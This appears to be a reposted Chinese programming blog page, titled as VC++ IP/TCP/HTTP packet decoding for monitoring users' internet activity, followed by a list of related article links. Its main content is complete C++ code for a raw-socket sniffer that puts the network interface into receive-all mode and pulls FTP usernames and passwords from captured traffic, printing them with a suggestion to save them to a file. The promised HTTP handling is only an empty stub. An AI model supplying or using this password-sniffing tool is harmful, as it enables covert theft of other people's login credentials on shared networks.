VC++实现ip数据包解包TCP解包HTTP
2012-09-04 18:12
190 查看
我们需要监控用户的互联网行为,则需要检测HTTP
如何在网络层截取HTTP呢,众所周知,网站是80号端口
代码实现如下
如何在网络层截取HTTP呢,众所周知,网站是80号端口
代码实现如下
#include "../common/initsock.h"
#include "../common/protoinfo.h"
#include <stdio.h>
#include <mstcpip.h>
#pragma comment(lib, "Advapi32.lib")
CInitSock theSock;
void GetFtp(char *pData, DWORD dwDestIp)
{
char szBuf[256];
static char szUserName[21];
static char szPassword[21];
if(strnicmp(pData, "USER ", 5) == 0)
{
sscanf(pData + 4, "%*[ ]%s", szUserName);
}
else if(strnicmp(pData, "PASS ", 5) == 0)
{
sscanf(pData + 4, "%*[ ]%s", szPassword);
wsprintf(szBuf, " Server Address: %s; User Name: %s; Password: %s; \n\n",
::inet_ntoa(*(in_addr*)&dwDestIp), szUserName, szPassword);
printf(szBuf); // 这里您可以将它保存到文件中
}
}
void DecodeIPPacket(char *pData)
{
IPHeader *pIPHdr = (IPHeader*)pData;
int nHeaderLen = (pIPHdr->iphVerLen & 0xf) * sizeof(ULONG);
switch(pIPHdr->ipProtocol)
{
case IPPROTO_TCP:
{
TCPHeader *pTCPHdr = (TCPHeader *)(pData + nHeaderLen);
switch(::ntohs(pTCPHdr->destinationPort))
{
case 21: // ftp协议
{
GetFtp((char*)pTCPHdr + sizeof(TCPHeader), pIPHdr->ipDestination);
}
break;
case 80: // http协议...
case 8080:
break;
}
}
break;
case IPPROTO_UDP:
break;
case IPPROTO_ICMP:
break;
}
}
void main()
{
// 创建原始套节字
SOCKET sRaw = socket(AF_INET, SOCK_RAW, IPPROTO_IP);
// 获取本地IP地址
char szHostName[56];
SOCKADDR_IN addr_in;
struct hostent *pHost;
gethostname(szHostName, 56);
if((pHost = gethostbyname((char*)szHostName)) == NULL)
return ;
// 在调用ioctl之前,套节字必须绑定
addr_in.sin_family = AF_INET;
addr_in.sin_port = htons(0);
memcpy(&addr_in.sin_addr.S_un.S_addr, pHost->h_addr_list[0], pHost->h_length);
printf(" Binding to interface : %s \n", ::inet_ntoa(addr_in.sin_addr));
if(bind(sRaw, (PSOCKADDR)&addr_in, sizeof(addr_in)) == SOCKET_ERROR)
return;
// 设置SIO_RCVALL控制代码,以便接收所有的IP包
DWORD dwValue = 1;
if(ioctlsocket(sRaw, SIO_RCVALL, &dwValue) != 0)
return ;
// 开始接收封包
printf(" \n\n begin to monitor ftp password... \n\n");
char buff[1024];
int nRet;
while(TRUE)
{
nRet = recv(sRaw, buff, 1024, 0);
if(nRet > 0)
{
DecodeIPPacket(buff);
}
}
closesocket(sRaw);
}
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- VC++实现ip数据包解包TCP解包HTTP
- VC++实现ip数据包解包TCP解包HTTP
- VC++实现ip数据包解包TCP解包HTTP
- VC++实现ip数据包解包TCP解包HTTP
- VC++分析数据包实现分析http协议
- VC++分析数据包实现TCP协议的分析
- VC++分析数据包实现TCP协议的分析
- LwIP 协议栈源码详解 ——TCP/IP 协议的实现(四:数据包 pbuf )
- 利用MyEclipse的TCP/IP Minitor捕获Http的请求和响应数据包
- VC2010基于TCP/IP的Modbus传输实现
- [VC++]点对点(P2P)多线程断点续传的实现(TCP/IP)
- VC++分析数据包实现分析http协议
- 以太网,IP,TCP,UDP数据包分析
- TCP/IP,http,socket,长连接,短连接
- TCP/IP,Http,Socket,XMPP的区别
- TCP/IP、Http、Socket的区别
- tcpip数据包编码解析(chunk and gzip)_space of Jialy_百度空间
- VC实现Http Put方法
- TCP/IP数据包结构具体解释
- Http TCP/IP UDP socket 解析